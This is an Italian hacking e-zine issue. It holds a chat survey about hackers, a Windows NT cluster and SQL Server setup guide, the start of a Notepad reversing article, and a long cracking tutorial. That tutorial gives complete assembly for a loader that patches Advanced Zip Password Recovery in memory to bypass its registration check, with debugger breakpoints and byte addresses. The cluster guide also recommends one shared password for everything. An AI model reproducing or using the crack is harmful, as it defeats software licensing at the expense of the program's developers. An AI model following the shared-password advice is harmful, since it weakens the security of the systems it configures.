    del computer ci sta chi la usa per fare del "bene" e 
    chi per fare del "male" 
    I piu pericolosi non sono quelli che attaccano i siti web 
    ma  quelli che attaccano i navigatori con bombe e-mai cioe virus che
    infettano il computer e si diffondono nella rete oppure quelli che si
    trovano....
    nelle chat line come questa e che sono capaci di 
    inviare dei virus chiamati trojan che gli permettono di entrare nei pc 
delle
    persone che hanno accettato questo virus e possono avere accesso a tutte 
    le informazioni cancellandole o nascondendole dove vogliono
    poi ci sono i piccoli hackers...

C)  beh e' giusto che imparino
    internet e' il futuro
    e devono farne parte tutti
    tutti devono saperlo usare
 
                                   <_KHIM>
A) si ne parlano sempre in tv

B) sono delinquenti che si approfittano della povera gente rubando
   carte di credito e non so quante altre cose ancora 

C) penso che li dovrebbero arrestare e non farli stare piu' vicino 
   ad un computer 

            <Anonimo (non ha voluto che inserissi il suo nick)>

A) si ne parlano molto anche i miei amici 

B) gli hackers sono persone che con l'aiuto di virus entrano nei computer 
   per rubare informazioni e poi distruggono il computer in cui sono entrati

C) penso che siano dei geni ho amici che fanno queste cose ma non so 
   come fanno una volta sono entrati anche nel mio di computer

(e magari aprivano e chiudevano lo sportellino del tuo lettore CD e cose 
cos) 
      
   si come fai a saperlo ? dimmi come si fa ti prego!
               
(cambia amici e' meglio, che hackers non sono)
   


Non ho riportato tutte le interviste
per non annoiare troppo il lettore,ma la maggior parte degli intervistati
sull'argomento non si  espressa in modo esauriente, addirittura molti
quando hanno sentito la parola hacker chiudevano la connessione o si
rifiutavano di parlare,cercando di cambiare argomento.

La conclusione a cui sono arrivato  che la disinformazione
ha colpito la maggioranza della gente,infatti non essendo interessata
all'argomento "abbocca" a tutto ci che gli viene detto,senza curarsi
di approfondire e di trovare la verit.

Ho trovato pochissimi che erano favorevoli alla "cultura" hackers, essi sono
stati spesso definiti dei delinquenti,c'e' chi invocava addirittura la galera
per tutti gli hackers senza fare nessuna distinzione.

Molti non distinguevano i lamers dagli hackers,come pure i crackers da questi,
insomma vige la confusione assoluta.

Per ora mi fermo qui,poiche' non voglio mettermi a fare filosofia, comunque il
messaggio che voglio dare  quello di stare attenti a tutte le informazioni
che vi vengono date e soprattutto state attenti a come vi vengono poste,
cercate di filtrare,ogni aspetto ha la sua verit nascosta ed il nostro
compito deve essere quello di trovarla.

*********************************END*****************************************

Ringrazio tutti gli intervistati per la loro collaborazione.

Un saluto a tutto il gruppo!!!!
Ci VeDiAmO Al PrOsSiMo ArTiCoLo..Bye Bye by Z


Mi trovate su IRC con il nick ZETA,SHADOW-Z o pi raramente ZED.

****************************************************************************


---ZETA---

----------------------------------------------------------------[ hAcKinG ]---
===] CLUSTERING & SQL ]=======================================================
-----[ Maggiorana ]-----------------------------------------------------------


PRE-REQUISITI DI SISTEMA

I prerequisiti sotto elencati vanno letti prestando la massima attenzione in 
quanto risultano essere fondamentali per la corretta configurazione del 
Clustering .
Altrimenti sono guai. 
Pur prestando massima cura e testando personalmente la correttezza del doc 
errare umanum est, 
quindi non mi assumo responsabilit su nulla di ci che pu accadere.

 
Per  capire questo tipo di configurazione  prenderemo in esame un server  
ridondato in due unita centrali, con unit di streaming formata da 3 dischi 
precedentemente configurati con raid 1 tutti hot swap compresi quelli che 
fungono da ridondanza sulle unita che dora in avanti chiameremo Nodo1
e Nodo2. 
Per effettuare una corretta installazione e configurazione cluster dei server,
prima di qualsiasi operazione, bisogna assicurarsi che tutte le parti 
hardware siano correttamente configurate, il sistema operativo installato in 
maniera ineccepibile, ed avere disponibile un acesso alla rete locale. Se 
questi prerequisiti non vengono soddisfatti in pieno, si rischia di trovarsi 
dinnanzi a problemi di non facile soluzione. Quindi in nessun caso bisogna 
procedere se prima non si  certi che hardware e sistema operativo siano 
installati e configurati in manieracorretta.

Anche se uno solo dei pre-requisiti non viene rispettato possiamo trovarci 
davanti a situazioni spiacevoli.

APPROCCIO ALL'INSTALLAZIONE

In linea di massima  lapproccio allinstallazione del clustering. Risulta 
essere abbastanza laboriosa, nonostante ci prestando attenzione non si 
dovrebbero incontrare particolari difficolt. 

La prima cosa da fare  controllare  lARRAY. Non ci sono particolari esigenze
di spazio su disco se non per lunit cluster che deve essere di almeno 1Gb. 
Per creare un array se non ne siete capaci basta leggervi il doc dal sito 
microsoft se n sto qui a scrive un botto e poi, cazzo! fate qualcosa no! 

Quanto sopra esposto significa che comunque bisogner avere un unit deputata 
al clustering, potete chiamarla come volete ma  necessario che ci sia e che 
non sia inferiore ad 1Gb altrimenti il servizio non ha abbastanza spazio per 
poter lavorare in tranquillit e diventerebbe inaffidabile. 

IMPORTANTISSIMO AVERE UNA LOG-IN ALLA RETE CHE ABBIA PRIVILEGI DI 
AMMINISTRATORE.
 
Fatto questo bisogna andare ad indicare la configurazione della rete. 
Bisogna creare un utente sul PDC. Questo utente che chiameremo CLUSTERADMIN 
deve potersi loggare al dominio con privilegi di amministratore di rete. 
Dobbiamo inoltre avere a disposizione 4 IP spare che assegneremo al 
Nodo1 / Nodo2 /Server virtuale SQL / Intracluster . 

Ricordate di non mettere simboli o slash o sottolineature nelle label. 
Non sono ben tollerati e potrebbero creare confusione.

Prendiamo a questo punto il CD2 di Win NT enterprise  andiamo nella dir mcsc 
e lanciamo il setup del cluster. Durante linstallazione vi verr proposto il 
percorso mettete il percorso dell'intracluster che abbiamo nominato in 
precedenza. Poi vi verr chiesto i nIP di rete ed altri due ip che dovranno 
essere fittizi in quanto servono per la interconnessione fr nodo1 e nodo2  
questi sono  ip fittizi o virtuali. 
Ricordate di leggere le stringhe di commento in testa alle finestre che 
linstallazione vi propone e sar tutto ancora pi semplice. Per esempio io 
per praticit ho assegnato il nome di PUBLICLAN alllidirizzo col quale il 
server entra nella rete. Controlliamo mentre facciamo loperazione che sia 
settato su Only for Client Access se cos non fosse facciamolo noi per lui.

Andando aventi ci viene mostrato il secondo IP denominato INTRACLUSTER 
assicuriamoci che sia settato Use Only for Cluster Communication se cos 
non fosse facciamolo noi per lui. 
Ricordiamo che questo IP  quello della scheda intracluster dato allinizio 
dellinstallazione ed   fittizio. Un altro IP che deve essere diverso da 
quello del nodo1 appartiene al Nodo2 diverso ma uguale per tipologia.
ES: Nodo1 192.0.0.20 / Nodo2 192.0.0.40

Questa specie di LAN virtuale e formata da due schede dedicate che comunicano
tr loro tramite un cavo cross , in questo modo i due nodi parlano tra di 
loro.

Una volta portate a termine tutte le operazioni descritte dobbiamo ripetere la
procedura sul secondo nodo. Spostiamoci con il tasto Stamp logghiamoci e 
ripetiamo linstallazione del cluster come sopra descritto 

ATTENZIONE!!! NEL MOMENTO IN CUI LANCIAMO IL SETUP E CI APPARE LA SCHERMATA 
DOBBIAMO CAMBIARE IL TIPO DI INSTALLAZIONE. MENTRE SUL NODO1 ABBIAMO  CREATO 
UN NEW CLUSTER NEL NODO2 DOBBIAMO DIRGLI DI INSTALLARSI COME 
JOYNT-NEW-CLUSTER Il motivo   ovvio dato che il Nodo2 altro non  che un 
unit di ridondanza deve agganciarsi al cluster master che  presente sul 
Nodo1. Se noi installassimo anche il Nodo2 come NEW CLUSTER e come se 
mettessimo due periferiche EIDE su di uno stesso canale come master . 
Sai che bordello!!
Vi ricordo che durante linstallazione dobbiamo fornire tutte le informazioni 
richieste da setup quali nome Cluster ip  password etc... 

Consiglio di mettere un'unica password per tutto, evitando confusione e 
 dimenticanze , altrimenti sono problemi. 

Facciamo una verifica del nostro lavoro. Ora avremo nel nostro menu start di 
windows la voce ADMINISTRATIVE CLUSTER avviamolo e completiamo la 
configurazione:
Per ogni disco Linstallazione li lascia fuori dal gruppo cluster, che e poi 
quello che a noi interessa  dobbiamo mettere ordine.
Ci troveremo quindi il nostro gruppo cluster e publiclan, sotto di loro tutte
le unit che abbiamo identificato con le label, dove vediamo il Quorum 
clicchiamo con il tasto sul disco presente nella finestra di DX e selezioniamo
Change Group e mettiamolo in Cluster Group 

Il nome da noi dato al cluster. Adesso ricordatevi di  cancellare la vecchia
unita appena spostata controllando prima ciccandoci sopra che sia vuota, 
verificato questo cancelliamola. 
Ricordate che queste operazioni vanno ripetute su entrambi i nodi con lunica 
differenza che il nodo2 viene installato come joint "Come perch?" allora 
rileggete.

SE INVECE DOBBIAMO SPOSTARE IL SERVER SU  UN'ALTRA LAN LA PROCEDURA NON CAMBIA
DI MOLTO:

La prima cosa da fare  disinstallare SQL virtual server. Andiamo sul tasto 
avvio di windows SQL poi Failover cluster wizzard attenzione a non 
sbagliarvi con laltra voce di SQL per essere sicuri la voce  SQL server7.0
dopo pochi secondi SQL sar disinstallato. 

Ora dobbiamo disinstallare il cluster. Andiamo nel pannello di controllo 
clicchiamo licona Add/Remove e disistalliamo la voce Server Cluster.
Fatto questo spostiamoci con il tasto Stamp sul nodo 2 e ripetiamo 
loperazione.
Ora torniamo sul nodo 1  facciamo reeboot. Mentre fa il boot fate la stessa 
cosa con il nodo due sempre utilizzando il tasto stamp per spostarvi.
Ora le macchine sono di nuovo su, logghiamoci con il nostro account creato 
sul PDC  allinizio ed entriamo nel sistema. Se vogliamo andare a vedere 
possiamo controllare lesattezza delle label.
Nel nostro caso le ho configurate nel seguente modo SQLexe = Utilizzato per 
il prog SQL Intracluster = Utilizzato per lo swap del cluster  
SQLlog=Utilizzato per i log di SQL Etc 

Ok ora disinstallate il prog SQL "Attenzione a non confondervi, il server 
virtuale  una cosa, il prog un altra- CMQ il server e la prima voce il prog 
la seconda del men SQL"

Ora fate unistal del cluster e poi partite da capo dandogli le configurazioni 
della nuova rete sulla quale operate.
INSOMMA DOVETE DA RICOMINCIA' DA CAPO.

Spero di essere stato chiaro ma l'articolo l'ho scritto in fretta cercher di
migliorami ;-)
Per insulti parolacce pernacchi: maggiorana@tiscalinet.it

Se volete venirmi a trovare nella mia tana: members.xoom.it/maggiorana

---Maggiorana---

---------------------------------------------------------------[ cRacKinG ]---
===] ADVANCED ZIP PASSWORD RECOVERY V2.2 ]====================================
-----[ Quequero ]-------------------------------------------------------------
                                                                             
(Patching in memory)
 
 
Una luce splendente, elegante come il sol levante, apparve all' orizzonte. 
Arriv silenzioso un fautore del buon umore. Vi presento qualcosa di nuovo, 
un tutorial sul patching in memory di un programma packato col NeoLite, 
non  semplicissimo ma vi sar comunque molto utile

Col suo mantello color cammello scese dal ciel un uomo gaio, si pos su un 
albero e disse: "Miiiii sono Quequero". 

UIC's form Home page se presente: http://www.uic-spippolatori.com 
E-mail: UIC@mail.usa.com 
In AzzurraNet: #crack-it #ahccc  

Difficolt 
 ( )NewBies (X)Intermedio (X)Avanzato ( )Master 
   

Ecco come si fa a crackare un programma senza averi bisogno di unpackarlo :).

-----------------------------------------------------------------------------

Advanced Zip Password Recovery v2.2 
(Patching in memory) 
Written by Quequero
 
-[ Introduzione ]- 
 
Advanced Zip Password Recovery  un tool compresso con il caro neolite, non  
difficile da unpackare ma noi creeremo un programma che ci permetter di 
crackarlo in memoria senza per questo doverlo unpackare.

-[ Tools usati ]-
 
SoftIce qualunque versione 
Turbo Assembler 5.0 
Spy++ 
W32.inc (nell'allegato assieme ai sorgenti) 

-[ URL o FTP del programma ]-
 
http://www.eclomsoft.com/azpr.html 

-[ Notizie sul programma ]-
 
Advanced Zip Password Recovery (AZPR d'ora in poi)  un utile programmino che 
ci permette di bruteforzare i file zip per poi trovarne le password    

=] Essay [= 
 
AZPR  abbastanza utile come programma ma se non lo registriamo allora non ci 
permetter di bruteforzare password pi lunghe di 5 caratteri grgrgrgrgr, la 
cosa in effetti non ci piace ma noi comunque non siamo interessati a questo, 
infatti un giorno potrebbe capitarci di incontrare un programma unpackabile 
(moooooolto improbabile) o che non riusciamo ad unpackare(gi pi probabile :)

Allora cosa facciamo, lasciamo la vittoria ai programmatori? Mai! Quindi 
alleniamo ci per prospettive future :). Per prima cosa dobbiamo crackare il 
programma, non mi dilungher pi di tanto su questo dal momento che il nostro 
target  un altro, quindi avviamo il programma e come ovvio ci mostra la sua 
scrittina "Unregistered", bene, procedendo per ipotesi iniziamo a brekkare 
sulle API che gestiscono il registro di Windows perch forse il serial  letto
da l....quindi fire up your winice (ctrl+d) e settate un bpx su 
RegQueryValueExA....

O se preferite brekkate direttamente cos: bpx RegQueryValueExA if 
  ecx = = 70FCFC, premete F11
e sarete approdati al posto giusto, disabilitate i breakpoint con "bd *" e 
steppate con F10 fino a: 

xxxx:0040C733  E800FEFFFF  call 0040C538 

questa  la chiamata che decide se il programma  registrato o meno, se 
riporta 1 lo  altrimenti no...Steppate ancora con F10 finch non arriverete 
qui: 

xxxx:0040258C  7479  jz 00402607 

se il programma arrivato a questo punto salta, allora non  bene :) se non 
salta invece apparir come registrato, ottimo, ci che dobbiamo fare  
semplicemente noppare questi due byte....Bh facciamolo...ma facciamolo in 
memoria. 

Il crack  stato abbastanza rapido :) questa parte invece non so come verr 
fuori dal momento che evito di cercare tute su argomenti che conosco poco onde
evitare di essere influenzato,(anche se mi sono rimaste delle reminescenze di 
qualche tute su fravia) quindi far secondo cio che  mi  venuto in mente e 
cercher di esporvi tutto con chiarezza :) 
  
PATCHING IN MEMORY 
  
Bene, iniziamo col pianificare i nostri scopi malevoli  :), per prima cosa 
abbiamo bisogno di dire a WinPorco in quale processo andare a mettere le mani 
e per farlo abbiamo bisogno di trovarlo questo processo....Come? Bh, io ho 
pensato di usare un bel FindWindow che ha anche una semplice sintassi: 
  
HWND FindWindow( LPCTSTR lpClassName,  // puntatore al nome della classe 
LPCTSTR lpWindowName  // puntatore al nome della finestra 
);  

Se il valore riportato  0 allora c' stato un errore altrimeni in eax 
ritroveremo l'handle della finestra. 
Andiamo quindi a scrivere il nostro programma, prima di tutto dobbiamo sapere 
come si chiama la classe della finestra, per far questo avviate AZPR, aprite 
spy++, clickate su refresh e cercate la finestra: 
C30h nel mio caso  l'handle della finestra (quello che ci troveremo con 
FindWindow, "AZPR 
version 2.0 - unregistered"  la caption della finestra e TForm1  la classe,
cio quello che ci interessa, allora iniziamo ad abbozzare qualcosa nel nostro
programmino: 
  
.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL
UNICODE=0
INCLUDE W32.inc ; W32.inc lo trovate nell'allegato assieme ai sorgenti

.data

class     db "TForm1",0   ; ecco il nome della classe che ci interessa

.code
start:
xor eax, eax  ; meglio metterlo onde evitare che qualcosa vada storto...in 
fondo sono solo 2 byte :)

call FindWindow, offset class, NULL  ; la nostra cara chiamatina

int 3              ; ci servir per il debug

end start 
  
bene, compilate il tutto con: 
tasm32 -ml -m5 /t -q patchinmen
tlink32 -Tpe -aa -x -c patchinmen ,,, import32 
  
mettete in sice un bpint 3, avviate il prog e non dovete far altro che vedere 
se in eax, c' zero o qualcos'altro, se c' qualcos'altro allora  andato a 
buon fine....proviamo......avvio.....ottimo, eax contiene proprio C30h 
(attenti che a voi l'handle sar diverso). 

Adesso dall'handle dobbiamo risalire all'ID del processo, e possiamo usare 
GetWindowThreadProcessId, ecco la sintassi: 

DWORD GetWindowThreadProcessId( 

HWND hWnd,  // handle della finestra 
LPDWORD lpdwProcessId  // indirizzo di una variabile per l'ID del processo 
);  

quindi andiamo ad aggiungere questa funzione al nostro programma che cos 
diventa: 
  
.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL
UNICODE=0
INCLUDE W32.inc

extrn GetWindowThreadProcessId:Proc ; Questa volta l'API la dobbiamo definire

.data

class         db "TForm1",0
handle     dd 1 dup (0)        ; qua ci mettiamo l'handle
ProcessID    dd 1 dup (0)   ; e qua il PID

.code
start:
xor eax, eax
call FindWindow, offset class, NULL
mov handle, eax
call GetWindowThreadProcessId, handle, offset ProcessID
int 3     
end start 
  
compiliamo.....testiamo...oki la chiamata riporta il un valore che 
evidentemente sar il PID :)
a questo punto siamo in grado di aprire il processo con OpenProcess.... 

HANDLE OpenProcess( 

DWORD dwDesiredAccess,  // flag di accesso 
BOOL bInheritHandle,  // ereditazione dell'handle  
DWORD dwProcessId  // process identifier  
);  

qua l'unica cosa da spiegare sono i flag, ne esistono molteplici che potrete 
vedere su win32.hlp, ma io vi elenco l'unico che ci serve cio: 

PROCESS_ALL_ACCESS  che corrisponde al valore di FFFh, ma che  inserito cmq 
nel file W32.inc, e quindi non dobbiamo preoccuparci di definirlo, andiamo 
ancora una volta a modificare il nostro programma aggiungedoci la funzione 
OpenProcess con i parametri che ci interessano quindi PROCESS_ALL_ACCESS come 
primo parametro, il secondo lo settiamo a FALSE ed il terzo valore lo 
prendiamo dall'ultima call, ma facciamo un'ultima modifca, riapriamo Spy++, 
clickiamo sulla nostra finestra e ci appare il menu di prima, andiamo su 
"Windows" e vediamo qual' la finestra "principale" che troviamo all'ultima 3
riga: 
  
adesso sappiamo che l'handle della finestra principale  57C, quindi nella 
lista di spy++ cerchiamo questa finestra (che in realt sta una riga sotto la 
finestra di prima :), troviamone la classe che  TApplication e sostituiamola 
nel codice a TForm, quindi alla fine avremo ci: 
  
class            db "TApplication",0   ; Usiamo questa perch  meglio 
                                         operare sulla finestra principale
handle           dd 1 dup (0)
ProcessID        dd 1 dup (0)
ProcessHandle    dd 1 dup (0)

.code
start:

xor eax, eax
call FindWindow, offset class, NULL
mov handle, eax
call GetWindowThreadProcessId, handle, offset ProcessID
call OpenProcess, PROCESS_ALL_ACCESS, FALSE, dword ptr[ProcessID] ; Ecco la 
                                                                    nostra 
                                                                    nuova 
                                                                    chiamata

mov ProcessHandle, eax ; Spostiamo l'handle in un buffer per usarlo poi in 
futuro int 3 
  
Andiamo a debuggare il tutto, se la chiamata a OpenProcess vi riporta 0 allora
 fallita, altrimenti  andata a buon fine, di consegueza se tutto  a posto 
(e vi ricordo che dovete debuggare il tutto con AZPR in esecuzion) possiamo 
procedere a trovare la locazione di memoria che ci interessa patchare. Come 
precedentemente detto nel tute il jump che ci interessa noppare sta al 
RVA 0040258C, dovete sapere che ogni applicazione ha un suo range di memoria 
da poter usare e ci che abbiamo fatto con OpenProcess  stato solo di aprire 
il processo di AZPR per poter andar a leggere nella memoria del programma in 
esecuzione, ora per prima di continuare nel patch dobbiamo controllare se 
effettivamente la versione i byte che ci interessano sono presenti, per far 
ci useremo WriteProcessMemory, una funzione estremamente semplice: 

BOOL ReadProcessMemory( 

HANDLE hProcess,  // handle del processo nel quale dobbiamo andare a leggere 
LPCVOID lpBaseAddress,  // indirizzo nel quale iniziare la lettura 
LPVOID lpBuffer,  // indirizzo di un buffer nel quale piazzare i dati letti 
DWORD nSize,  // numero di byte da leggere 
LPDWORD lpNumberOfBytesRead  // indirizzo del numero dei byte letti 
);  

come vedete la funzione non presenta nessuna difficolt, ci serve solo 
conoscere l'indirizzo nel quale andare a leggere i dati, e la guida di 
winfrocio ci dice anche che l'ultimo parametro pu essere NULL, quindi ora che
sappiamo quale deve essere l'RVA andiamo a scrivere un'altra volta il nostro 
programma: 
  
class                db "TApplication",0
handle               dd 1 dup (0)
ProcessID            dd 1 dup (0)
ProcessHandle        dd 1 dup (0)
ReadBuffer           dd 1 dup (0)
OrigBytes            dw 7974h ; Bytes originali invertiti dal momento che gli 
                                intel li invertono
CaptionDiff          db 'Error!',0  ; MessageBox di avviso nel caso i byte non
                                      vengano trovati
MessageDiff          db 'Program version is probably different,',0dh,0ah
                     db 'crack not applied!',0

.code
start:

xor eax, eax
call FindWindow, offset class, NULL
mov handle, eax
call GetWindowThreadProcessId, handle, offset ProcessID
call OpenProcess, PROCESS_ALL_ACCESS, FALSE, dword ptr[ProcessID]
mov ProcessHandle, eax
mov eax, 0040258Ch
call ReadProcessMemory, [ProcessHandle], eax, offset ReadBuffer, 2, NULL ; 
Qui andiamo a leggere la memoria

mov esi, offset OrigBytes   ; E facciamo un compare tra i
mov edi, offset ReadBuffer  ; byte letti
mov ecx, 2
repz cmpsb                  ; Corrispondono?
jnz Different               ; Se la risposta  NO, allora manda la messagebox
int 3                       ; Questo  il solito int3 per fare il debug 

Different:
push MB_ICONSTOP or MB_OK
push offset CaptionDiff
push offset MessageDiff
push NULL
call MessageBoxA;, MB_ICONSTOP or MB_OK, offset CaptionDiff, 
         offset MessageDiff, NULL

end start 
  
bene, se anche il check dei byte  superato possiamo andare a cambiarli con 
due NOP. Ma c' un piccolo problema, cio che il programma fa quel check una 
sola volta all'avvio, noi invece abbiamo operato ad applicazione gi avviata e
quindi anche se modificassimo i byte non otterremmo nulla visto che il 
programma  gi in UNREGISTERED status :), per ovviare a questo problema 
potremmo avviare l'applicazione con WinExec solo che questa API ci ritorna il
controllo solo dopo che l'applicazione  completamente avviata......
e di conseguenza anche dopo il check, quindi useremo l'API CreateProcess, mi 
era stato suggerito di sospendere il thread con CREATE_SUSPENDED e poi di 
riesumarlo, ma ho trovato un metodo un po' pi semplice, cio, avvieremo lo 
stesso il programma con CreateProcess e con un loop cercheremo la locazione
e quindi la patcheremo, lasciate prima che vi spieghi come funziona 
CreateProcess che  una della API pi antipatiche :): 
  
BOOL CreateProcess( 
LPCTSTR lpApplicationName,  // pointer to name of executable module  
LPTSTR lpCommandLine,  // pointer to command line string  
LPSECURITY_ATTRIBUTES lpProcessAttributes,  // pointer to process security 
                                               attributes  
LPSECURITY_ATTRIBUTES lpThreadAttributes,  // pointer to thread security 
                                              attributes  
BOOL bInheritHandles,  // handle inheritance flag  
DWORD dwCreationFlags,  // creation flags  
LPVOID lpEnvironment,  // pointer to new environment block  
LPCTSTR lpCurrentDirectory,  // pointer to current directory name  
LPSTARTUPINFO lpStartupInfo,  // pointer to STARTUPINFO  
LPPROCESS_INFORMATION lpProcessInformation  // pointer to PROCESS_INFORMATION
);  

...Come prima parametro settiamo il nome dell'exe da eseguire (azpr.exe) il 
secondo parametro non ci interessa e lo settiamo a NULL, il terzo parametro 
anche, il 4 lo possiamo tranquillamente mettere a FALSE, questo comando serve
a specificare se l'handle ritornato potr essere ereditabile dai processi 
figli, il 5 lo settiamo a DEBUG_PROCESS, serve a specificare che il processo 
deve essere trattato come un debugger, non  necessario ma mettiamocelo :), 
il 6 lo settiamo a NORMAL_PRIORITY_CLASS visto che non ci interessa avere 
una priorit di esecuzione pi alta o pi bassa, il 7 e 8 lo settiamo a NULL
mentre gli utlimi due necessitano di puntare rispettivamente ad una struttura 
di Startup e ad una struttura di PROCESS_INFORMATION, non preoccupatevi non  
assolutamente difficile. Dopo ci possiamo andare a scrivere la routine che 
patcher il programma in memoria, per far ci aggiungeremo dopo 
ReadProcessMemory il nostro bel WriteProcessMemory che presenta pi o meno la 
stessa sintassi dell'API affine: 

BOOL WriteProcessMemory( 

HANDLE hProcess,  // handle del processo nel quale dobbiamo andare a scrivere 
LPVOID lpBaseAddress,  // indirizzo nel quale iniziare la scrittura  
LPVOID lpBuffer,  // puntatore a un buffer nel quale piazzare i dati da 
                     scriverei 
DWORD nSize,  // numero di byte da scrivere 
LPDWORD lpNumberOfBytesWritten  // numero attuale di byte scritti 
);  

per l'ultima volta vi ripresento tutto il codice anche con quest'ultime 
aggiunte ed anche ottimizzato con alcuni messagebox ed un loop che vi 
spiegher a fine listato: 
  
.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL
UNICODE=0
INCLUDE W32.inc

extrn GetWindowThreadProcessId:Proc

.data

class             db "TApplication",0
handle               dd 1 dup (0)
ProcessID            dd 1 dup (0)
ProcessHandle        dd 1 dup (0)
ReadBuffer           dd 1 dup (0)
OrigBytes           dw 7974h ; Bytes originali invertiti
PatchBytes          dw 9090h  ; I byte con i quali cambieremo l'istruzione
CaptionDiff       db 'Error!',0
MessageDiff       db 'Program version is probably different,',0dh,0ah
                  db 'crack not applied!',0
CaptionSucc       db 'Success!',0
MessageSucc       db ' Crack successfully applied! ',0dh,0ah
                  db '                             ',0dh,0ah
                  db ' Created By Quequero          ',0dh,0ah
                  db '      FOR U.I.C.                       ',0dh,0ah
                  db '      http://quequero.cjb.net      ',0
ExeName           db 'azpr.exe',0
CaptionProb       db 'Problem!!!',0
MessageProb       db 'There is a problem, crack cannot be applied! ',0dh,0ah
                  db 'Here''s some possible solution: ',0dh,0ah
                  db '1) Name of .exe is different from azpr.exe 
                         (if yes rename it) ',0dh,0ah
                  db '2) This crack is not in the same directory of the 
                         program. ',0dh,0ah
                  db 'Try to move in the right directory, generally: 
                         c:\program\AZPR',0

SecAttr        STARTUPINFO <?> ; Questi sono i semplicissimi puntatori alle 
                                 strutture che vi indicato durante la
ProcInf        PROCESS_INFORMATION <?> ; spiegazione del CreateProcess


.code
start: 
    call CreateProcess, offset ExeName, NULL, NULL, FALSE, DEBUG_PROCESS, 
                                        NORMAL_PRIORITY_CLASS, NULL, NULL, 
offset SecAttr, offset ProcInf  ; Ecco a voi il CreateProcess, se vi riporta 
1 allora  tutto okkei

test eax, eax ; Il CreateProcess riporta 0?

jz Problem ; Se si vuol dire che ci sono dei problemi, mostra la messagebox 
con le soluzioni

loop: call FindWindow, offset class, NULL ; Ecco il loop che vi spiegher dopo
    test eax, eax
    jz loop
    mov handle, eax
    call GetWindowThreadProcessId, handle, offset ProcessID
    call OpenProcess, PROCESS_ALL_ACCESS, FALSE, dword ptr[ProcessID]
    mov ProcessHandle, eax
    mov eax, 0040258Ch ; Muovi in eax l'RVA della locazione alla quale andremo
                         a leggere
    call ReadProcessMemory, [ProcessHandle], eax, offset ReadBuffer, 2, NULL ;
                         Vai a leggere
    mov esi, offset OrigBytes 
    mov edi, offset ReadBuffer
    mov ecx, 2
    repz cmpsb
    jnz Different  ; Confronta i byte e se sono uguali procedi, altrimenti 
                     salta
   mov eax, 0040258Ch
   call WriteProcessMemory, [ProcessHandle], eax, offset PatchBytes, 2, NULL ;
       Ottimo, sono uguali, allora cambiali

    push MB_ICONINFORMATION or MB_OK
    push offset CaptionSucc
    push offset MessageSucc
    push NULL
    call MessageBoxA ; Mostra il box che ci dice che tutto  andato bene
    call ExitProcess ; Ed esci 

Different:
    push MB_ICONSTOP or MB_OK
    push offset CaptionDiff
    push offset MessageDiff
    push NULL
    call MessageBoxA
call ExitProcess

Problem:
    push MB_ICONSTOP or MB_OK
    push offset CaptionProb
    push offset MessageProb
    push NULL
    call MessageBoxA
call ExitProcess

end start 
  
Ora state attenti che vi riassumo tutto quanto: per prima cosa il file viene 
avviato con CreateProcess visto che ci rida il controllo all'istante, se la 
funzione riporta 1  andato tutto bene, se riporta 0 avete sbagliato qualcosa,
quindi viene eseguito un loop di FindWindow,perch? Perch in questo modo 
facciamo un check continuo fino all'apparizione della nostra finestra e cos 
avremo il tempo di patchare i byte prima che il programma decida di non essere
registrato, appena FindWindow riporta un valore diverso da 0 chiamamo 
GetWindowThreadId per ottenere l'ID del thread della finestra, se anche questa
va a buon fine otteniamo un ID che possiamo usare con OpenProcess per aprire 
il processo. Aperto il processo andiamo a fare un confronto tra i byte che 
"dovremmo" trovare e quelli che effettivamente troviamo, se sono uguali 
procediamo col cambiarli e con l'avvisare l'utente che tutto  andato bene, 
altrimenti facciamo comparire il box che ci informa di una diversit tra 
l'exe che abbiamo e quello che dovremmo avere. 

I check per vedere se tutto procede bene sono necessari solamente dopo il 
CreateProcess ed al check tra i byte, non serve inserirne altri visto che le 
possibilit di fallimento del WriteProcessMemory sono alquanto remote. 

Nell'allegato troverete tutto il necessario alla compilazione del programma, 
ovviamente non troverete il tasm che potrete scaricare tranuillamente sul
mio sito (Sezione Tools).

Forse la prossima volta creeremo un trainer, vi garantisco
comunque che fare un trainer  molto pi semplice di patchare un programma 
come questo in quanto non avete la necessit di cambiare i byte prima di 
determinati eventi, prendete come esempio il numero di vite di un gioco, lo 
potete cambiare quando volete, mia dopo certi eventi giusto? 

Bh ci siamo divertiti abbastanza, abbiamo imparato come patchare 
in memoria un programma......non  mica una cosa da poco :)))) 
                                                   
Note finali  

I ringraziamenti sono d'obbligo stavolta, ma prima saluto tutti quelli della 
UIC...Ciauzzzzzz.. ed ora quelli che si meritano un sentito ringraziamento: 

Kill3xx: Grazie tantissimo che hai una soluzione per ogni problema, se non ci 
         fossi stato tu starei ancora provando chiss cosa per patchare il 
         programma prima del check :) 

Xoanon: Mia musa ispiratrice che mi ha fatto venire un paio di ideuzze non 
        male per il programma 

Neural_Noise: Grazie anche al mio cyberfratellino che  sempre gentile e che 
              mi voleva far creare thread su thread per patchare sto programma
              :))) 

Ciauz a tuttiiiiiiiiiiiiiiiiiiiiiiii 

Disclaimer 
 

Vorrei ricordare che il software va comprato e  non rubato, dovete registrare 
il vostro prodotto dopo il periodo di valutazione. Non mi ritengo responsabile
per eventuali danni causati al vostro computer determinati dall'uso improprio 
di questo tutorial. Questo documento  stato scritto per invogliare il 
consumatore a registrare legalmente i propri programmi, e non a fargli fare 
uso dei tantissimi file crack presenti in rete, infatti tale documento aiuta
a comprendere lo sforzo immane che ogni singolo programmatore ha dovuto 
portare avanti per fornire ai rispettivi consumatori i migliori prodotti 
possibili. 
Noi reversiamo al solo scopo informativo e di miglioramento del linguaggio 
Assembly. 
Capitoooooooo????? Bh credo di si ;))))  

---QueQuero---

---------------------------------------------------------------[ cRacKinG ]---
===] MINI REVERSE DI NOTEPAD ]================================================
-----[ Golem ]----------------------------------------------------------------

Non ci sarebbe bisogno di un disclaimer visto che non si fanno crack tuttavia
il modificare un programma, anche per migliorarlo,  espressamente vietato da
quasi tutti gli applicativi windows, pertanto tale documento  da intendersi
per soli scopi educativi e di informazione, l'autore declina ogni
responsabilit per eventuali malfunzionamenti.

Per far capire che reversing non vuol dire solo crack ma cercar di capire il
funzionamento di un programma e migliorarlo (o addattarlo alle nostre
esigenze) ho scritto questo tute di poche righe.

Quello che faremo  di una semplicit spaventosa, quindi non penso ci siano
problemi di comprendonio... (se si non posso farci nulla)

L'idea mi  venuta l'altra sera quando apprestandomi a leggere la scorsa
ezine in formato testo mi compariva una MessageBox dicendo che il file era
troppo grande e se desideravo aprirlo con il WordPad.

